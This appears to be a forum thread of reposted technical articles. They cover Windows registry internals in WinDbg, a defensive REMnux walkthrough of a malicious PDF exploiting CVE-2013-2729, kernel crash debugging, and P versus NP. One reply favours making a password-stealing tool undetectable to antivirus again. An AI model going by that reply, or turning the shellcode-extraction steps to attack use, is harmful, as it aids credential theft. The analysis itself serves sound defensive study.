Since we are on the topic of keys, I thought it would be appropriate to look at the concept of keys and how we can investigate them further with WinDbg. We can first use the !reg openkeys extension to view any open keys. Please note that I've limited the output of the extension to one hive. However, we can gather more interesting information by looking at a few data structures. Each key has a Key Control Block (KCB); we can use the _CM_KEY_CONTROL_BLOCK data structure to view information about an open key. This is similar to the information which can be found with the !reg kcb extension; normally you need to use the !reg findkcb extension with the full registry path in order to find the KCB address, but in the open-keys case you can simply use !reg kcb since the KCB address is already given.

The Configuration Manager maintains open keys within a table for fast name lookups. The table can be found through two global variables, CmpCacheTable and CmpHashTableSize. CmpCacheTable is a pointer to a hash table, which explains the _CM_KEY_HASH data structure within the KCB; each entry within the table is a pointer to a _CM_KEY_HASH structure, and the NextHash field points to the next structure within the table.

Source: link

Exploring the Windows Registry Part 3

Cells are containers for information such as keys, hence the different types of Cells explained in the last post. In order to make the logical structure of the Registry clearer, it's important to state how all the different parts I've been discussing fit together to form one complete picture of the Windows Registry: Hives are split into Bins, and Bins are then split into Cells. An empty Bin does not contain any Cells, whereas a Bin with Cells obviously contains Cells holding registry data.

This brings us to Cell Indexes and Cell Mappings, and some of the data structures we can explore with WinDbg. Cell Indexes are essentially pointers which link cells from different hives together, making it easier and more efficient for the Configuration Manager to find the information it is searching for. More specifically, a Cell Index is an offset into the hive minus the size of the base block for the selected hive.

The tables which the Cell Indexes are used to index into can be found within the Storage.Map member of the _DUAL data structure inside the appropriate _HHIVE data structure. We can expand the _DUAL data structure and examine this member. The _HMAP_DIRECTORY is an array of pointers to map tables, whose entries in turn contain the information for a specific Block and Bin.
The FreeDisplay field is used for tracking free cells in memory.

Since Hives are allocated from paged pool, they need to be mapped, as paged pool isn't guaranteed to be contiguous. This leads to the concept of Cell Index Mapping, which works very much like virtual address translation on x86 systems (remember that x64 adds an additional table of directory pointers). Using the translation diagram from the original post, it becomes more apparent what the pointers within the mentioned data structures are used to index into: the Directory Index points into the hive's Cell Map Directory, which in turn points to a Cell Map Table via the Table Index, and the Byte Offset then locates the specific Cell within the Hive Block. There is an additional bit which is either 0 or 1 and determines whether the Hive is Volatile or Stable, and therefore which set of tables to begin searching with: 1 is Volatile and 0 is Stable. This translation is used for hives in memory.

Directory Index = 10 bits
Table Index = 9 bits
Byte Offset = 12 bits

Hives usually reside on the hard disk and are mapped into memory only in parts, in order to avoid excessive consumption of the Cache Manager's address space. The number of mapped views for a hive is limited to 256; when this limit has been reached and a new mapping is required because the Configuration Manager needs another part of the hive in memory, the LRU (Least Recently Used) views list is consulted and the least recently used mapping is removed from the list. This data structure is allocated from paged pool.

There are some interesting WinDbg extensions we can use to find additional information related to Cell Indexes, such as the !reg cellindex extension. The extension shows the virtual address associated with a Cell Index. The first argument is the hive address and the 40 is the offset we are looking for; I've used the SYSTEM hive in this example.

Source: link
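The cell-index translation described above is easy to mimic in a few lines. Below is a minimal sketch, assuming the layout given in the post (one storage-type bit, a 10-bit directory index, a 9-bit table index and a 12-bit byte offset); the index value used is just the 0x40 offset mentioned above, not taken from a real hive.

def decode_cell_index(cell_index):
    # Bit 31: storage type (1 = Volatile, 0 = Stable).
    storage_type = (cell_index >> 31) & 0x1
    # Bits 30-21: directory index (10 bits) into the cell map directory.
    directory_index = (cell_index >> 21) & 0x3FF
    # Bits 20-12: table index (9 bits) into the selected cell map table.
    table_index = (cell_index >> 12) & 0x1FF
    # Bits 11-0: byte offset (12 bits) into the 4096-byte hive block.
    byte_offset = cell_index & 0xFFF
    return {
        'storage': 'Volatile' if storage_type else 'Stable',
        'directory_index': directory_index,
        'table_index': table_index,
        'byte_offset': byte_offset,
    }

print(decode_cell_index(0x00000040))
# {'storage': 'Stable', 'directory_index': 0, 'table_index': 0, 'byte_offset': 64}

This decoding is essentially what the !reg cellindex extension automates before reporting the corresponding virtual address.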
18. Mass mailings and targeted campaigns that use common file formats to host or exploit code have been, and remain, a very popular vector of attack; in other words, a malicious PDF or MS Office document received via e-mail or opened through a browser plug-in. In regard to malicious PDF files, the security industry saw a significant increase in vulnerabilities after the second half of 2008, which might be related to Adobe Systems' release of the specifications, format structure and functionality of PDF files.

Most enterprise network perimeters are protected by several security filters and mechanisms that block threats. However, a malicious PDF or MS Office document can be very successful at passing through firewalls, intrusion prevention systems, anti-spam, anti-virus and other security controls. Once it reaches the victim's mailbox, this attack vector leverages social engineering techniques to lure the user into clicking/opening the document. Then, for example, if the user opens a malicious PDF file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap, making it run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability can be exploited without even opening the file, just by having the malicious file on the hard drive, as described by Didier Stevens.

From a 100-foot view, a PDF file is composed of a header, body, reference table and trailer. One key component is the body, which might contain all kinds of content-type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex, which means the same information can be encoded and obfuscated in many ways. For example, objects contain streams that can be used to store data of any type and size. These streams are compressed, and the PDF standard supports several algorithms, called Filters, including ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode and DCTDecode. PDF files can contain multimedia content and support JavaScript and ActionScript through Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques, making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All these features and capabilities translate into a huge attack surface!

From a security incident response perspective, knowing how to perform a detailed analysis of such malicious files can be quite useful. When analyzing this kind of file, an incident handler can determine the worst it can do, its capabilities and its key characteristics. Furthermore, it helps the team be better prepared to identify future security incidents and to contain, eradicate and recover from those threats. So which steps could an incident handler or malware analyst perform to analyze such files? In the case of malicious PDF files there are 5 steps. Using the REMnux distro, the steps are described by Lenny Zeltser as:

1. Find and extract JavaScript
2. Deobfuscate JavaScript
3. Extract the shellcode
4. Create a shellcode executable
5. Analyze the shellcode and determine what it does
A summary of tools and techniques for analyzing malicious documents with REMnux is described in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and provide an introduction to the tools and techniques, below is the analysis of a malicious PDF using these steps.

The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of the Adobe Reader JavaScript engine to exploit CVE-2013-2729. This vulnerability, found by Felipe Manzano, is an integer overflow in several versions of Adobe Reader when parsing BMP files compressed with RLE8 encoding embedded in PDF forms. The file was detected on VirusTotal by only 6 of the 55 AV engines. Let's go through each one of the mentioned steps to find the malicious PDF's key characteristics and capabilities.

1st Step – Find and extract JavaScript

One technique is to use Didier Stevens' suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is pdfid, which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contains some of these keywords. In this case the first observation shows the PDF file contains 6 objects and 2 streams. No JavaScript is mentioned, but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms, which might indicate it is malicious.

Looking deeper, we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity, but in this case Object 2 is the /XFA element, which references Object 1, and Object 1 contains a compressed and rather suspicious stream. Following this indicator, pdf-parser.py allows us to show the contents of an object and pass the stream through one of the supported filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) via the --filter switch. The --raw switch shows the output in an easier-to-read form. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren't visible in the original PDF file. If this document is opened by a victim, the /XFA keyword will execute this malicious code.

Another fast method to find whether the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files, helping to show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, and execute JavaScript and shellcode. When running the malicious PDF file against the latest version of the tool, it shows very useful information about the PDF structure and its contents, and can even detect which vulnerability it triggers in case it has a signature for it.

2nd Step – Deobfuscate JavaScript

The second step is to deobfuscate the JavaScript, which can contain several layers of obfuscation. In this case there was quite some manual cleanup of the extracted code just to get it isolated. The object.raw file contained 4 JavaScript elements between <script xxxx contentType="application/x-javascript"> tags and 1 image in base64 format in an <image> tag. This JavaScript code between tags needs to be extracted and placed into a separate file.
The same can be done for the chunk of base64 data, which, when decoded, produces a 67 MB BMP file. The JavaScript in this case was rather cryptic, but there are tools and techniques that help interpret and execute the code. In this case I used another tool called js-didier.pl, which is Didier's version of the SpiderMonkey JavaScript interpreter. It is essentially a JavaScript interpreter without the browser plugins, which you can run from the command line. This allows running and analyzing malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, executes the code and prints the results into files named eval.00x.log. I got some errors on one of the variables due to the manual cleanup, but it was enough to produce several eval log files with interesting results.

3rd Step – Extract the shellcode

The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. Among other things, the file contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode; you typically find shellcode in JavaScript encoded this way. These Unicode-encoded strings need to be converted into binary. To perform this, isolate the Unicode-encoded strings into a separate file and convert the Unicode (\u) notation into hex (\x) notation. This is done with a series of Perl regular expressions using a REMnux script called unicode2hex-escaped (a minimal stand-in for it is sketched at the end of this post). The resulting file will contain the shellcode in hex format ("\xeb\x06\x00\x00..."), which will be used in the next step to convert it into a binary.

4th Step – Create a shellcode executable

Next, with the shellcode encoded in hexadecimal format, we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py, written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states, "The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine it. This approach is useful for analyzing shellcode that's difficult to understand without stepping through it with a debugger."

5th Step – Analyze the shellcode and determine what it does

The final step is to determine what the shellcode does. To analyze the shellcode you could use a disassembler or a debugger. In this case, static analysis of the shellcode using the strings command shows several API calls used by the shellcode. It also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed.

We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the network. This URL can be used as evidence and to identify whether machines have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there, but it is known to be a variant of the GameOver Zeus malware.

The steps followed are manual, but with practice they are repeatable. They just represent a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist, and much deeper analysis can be done. The focus was to demonstrate the 5 steps that can be used as a framework to discover indicators of compromise that will reveal machines that have been compromised by the same bad guys.
However, using these 5 steps, many other questions could be answered. By applying the mentioned tools and techniques, and others, within the 5 steps, we can gain a better practical understanding of how malicious documents work and which methods are used by the bad guys. Two great resources for this type of analysis are the Malware Analyst's Cookbook: Tools and Techniques for Fighting Malicious Code book by Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Techniques course.

Source
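As referenced in the 3rd step above, here is a minimal Python stand-in for the Unicode-to-hex conversion (the REMnux unicode2hex-escaped original is a Perl script). The sketch assumes the shellcode is stored as \uXXXX escapes with the usual low-byte-first packing; the sample string is made up and only mirrors the "\xeb\x06\x00\x00..." style of output mentioned in the post.

import re

def unicode_escapes_to_hex(js_string):
    # Each \uABCD escape packs two shellcode bytes, low byte first,
    # so \u06eb becomes \xeb\x06.
    def repl(match):
        value = match.group(1)
        return '\\x{}\\x{}'.format(value[2:4], value[0:2])
    return re.sub(r'\\u([0-9a-fA-F]{4})', repl, js_string)

# Tiny made-up sample purely for illustration:
sample = r'\u06eb\u0000\u9090'
print(unicode_escapes_to_hex(sample))   # \xeb\x06\x00\x00\x90\x90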
19. This is the first time I've debugged in a while, and the example is from a dump file which my friend Patrick on Sysnative has been debugging, but I wanted to write another debugging post which explains a few additional clues you can check with Stop 0x50s. The problem I find with some bugchecks is that their names can be a little generic and not really pinpoint the exact problem. Yes, they give an idea of the problem, but they do not give any major clues; a paged pool address could have been referenced at the wrong IRQL, which would likely lead to a Stop 0x50 or a Stop 0xA. Let's take a look at a few of the little clues available within the dump file.

Within the bugcheck description there are two clues which point to the type of problem. An invalid system address was being referenced, which is quite obvious, since it must have been a kernel-mode address (otherwise we wouldn't have gotten the bugcheck), and the address has been freed. Of course, the address could have been paged out to the page file, and corruption within the file system may then have led to that address being corrupted too.

A good next step is to check the CR2 register and see whether it matches the address referenced in Arg 1. The CR2 register, or Control Register 2, contains the Page Fault Linear Address: the last address which the program attempted to access. A linear address is pretty much the virtual (logical) address with the segment register added, which in this case is DS (Data Segment). The CR2 register should therefore be pointing to the referenced address from Arg 1.

We can investigate further and gather some small but important clues by taking a stack trace and then viewing the registers stored in the trap frame saved on the page fault. Using the .trap command on the trap frame address, we can view the registers, the referenced addresses and the last called function which caused the page fault. Note that a trap frame is the saved register state when an exception occurs, which is what a page fault technically is; it only leads to problems if the exception can't be handled by the page fault handler within MmAccessFault. The combination of the two registers, the ds segment and the offset, gives the address referenced in CR2 and in Arg 1 of the bugcheck description. We have found the referenced address.

Going back to the bugcheck description, notice "pointing to freed memory": the memory address has been wrongly freed with the nt!ExFreePoolWithTag function and paged back out to disk when it shouldn't have been, since this is a non-paged pool memory address. We can even check the IRQL with the !irql extension and see whether the problem could have been due to IRQL issues, since at elevated IRQL only non-paged pool can be accessed and any page fault is illegal. Since the IRQL was 0, the IRQL question is moot, as page faults are legal at that level.

Source: link
20. This is going to be a short description of the difference between the P and NP time complexity classes, and what these classes are based upon. They are used in computational complexity and algorithm analysis; computability theory, by contrast, is mainly concerned with what is computable, rather than how feasible that computation is.

The P and NP time complexity classes are commonly defined in terms of Deterministic and Non-Deterministic Turing Machines. These machines use similar mathematical notation to other models of computation, but are slightly more complex and have a wider application to other areas of Computer Science, which is one of the reasons why I prefer to look at Turing Machines rather than Finite-State Automata.

The P complexity class is the class of decision problems (Yes or No on some input) which are solvable within polynomial time on a Deterministic Turing Machine. It is written P(n) or just P, where n is the size of the input. NP, on the other hand, is the complexity class of decision problems which are solvable within polynomial time on a Non-Deterministic Turing Machine, and is therefore written NP(n) or simply NP. In general terms, P is considered the feasible complexity class for decision problems. For both classes, the running time of the algorithm grows polynomially as the size of the input increases. (The accompanying plot in the original post shows running time on the Y-axis against input size on the X-axis.)

NP-Completeness and NP-Hard

Given a decision problem A and another problem B, the problem A is considered NP-Hard if every B which belongs to NP is reducible to A. If A is NP-Hard and also belongs to NP, then A is considered NP-Complete. NP-Complete problems may be considered the hardest problems within NP; no polynomial-time algorithm is known for any of them, and finding one would imply P = NP.

Source: link
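One concrete way to see the distinction, using the standard verifier view of NP (which is equivalent to the non-deterministic machine definition above): for an NP-Complete problem such as Subset Sum, no polynomial-time solver is known, yet a proposed solution, a certificate, can be checked in polynomial time. A small sketch with made-up numbers:

def verify_subset_sum(numbers, target, certificate):
    # Polynomial-time check of a claimed solution: the certificate is a list
    # of indices whose elements are supposed to add up to the target.
    if len(set(certificate)) != len(certificate):
        return False                                   # indices must not repeat
    if any(i < 0 or i >= len(numbers) for i in certificate):
        return False                                   # indices must be in range
    return sum(numbers[i] for i in certificate) == target

numbers = [3, 34, 4, 12, 5, 2]
print(verify_subset_sum(numbers, 9, [2, 4]))   # True: 4 + 5 == 9
print(verify_subset_sum(numbers, 9, [0, 1]))   # False: 3 + 34 != 9

Finding such a certificate, however, may in the worst case require examining an exponential number of subsets as far as anyone knows, which is exactly the gap between P and NP that the post describes.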
21. This is a very simple error, and it can be useful in providing a hint at which point the crash may have occurred. It has been explained by Scott Noone on his blog, but I wanted to write my own blog post about it and provide the data structure which he didn't mention. The error was found by Patrick in a Stop 0x101 bugcheck, and it perfectly matches the context of the crash.

Looking at Parameter 4, we can see the index of the processor which has become hung. This is where the error message is located too. Using the !process extension on the same processor index, we can check the DirBase field to find the mismatch between the two addresses indicated in the error message. The DirBase is the physical address of the Process Directory Table Base. The DirBase field, within the structure formatted by !process, contains the address of the Process Directory Table Base for the current process, and thus, if the two addresses don't match, WinDbg will produce that error string. It tends to be caused when a crash occurs during a context switch. You can find the same field under the _KPROCESS data structure.

The Process Directory Table Base is private to each process address space and is used in conjunction with the TLB cache and TLB flushing. It covers the virtual address pages which belong to that process, and thus when a context switch occurs, the control register is changed to the directory table base of the new process and all the entries within the TLB cache are flushed. Afterwards, once the new address space has been loaded, each page translation results in a complete page walk until the TLB cache entries have been rebuilt. This is an expensive process, and thus some processor architectures will tag TLB entries as belonging to certain processes, and then only flush the corresponding tags.

Source: link
22. trafic.ro t5.ro @Terry.Crews you can find more here: https://www.google.co.uk/search?q=statistici+trafic+web+site&oq=statistici+trafic+web+site&gs=&gws_rd=ssl
23. @LuckyLUciano now that it has lost its FUD status, thanks to a genius who scanned it on VirusTotal, it is detected by antivirus engines (because it is a malicious program; not against you, but you can "steal passwords" with it, so you can see why it gets detected...). Wait for byte to release an update; maybe he'll make it FUD again, and let's hope it doesn't get burned again.
24. Relax, you're not even going to get there )
25. I'd like the extension too, please. Thanks.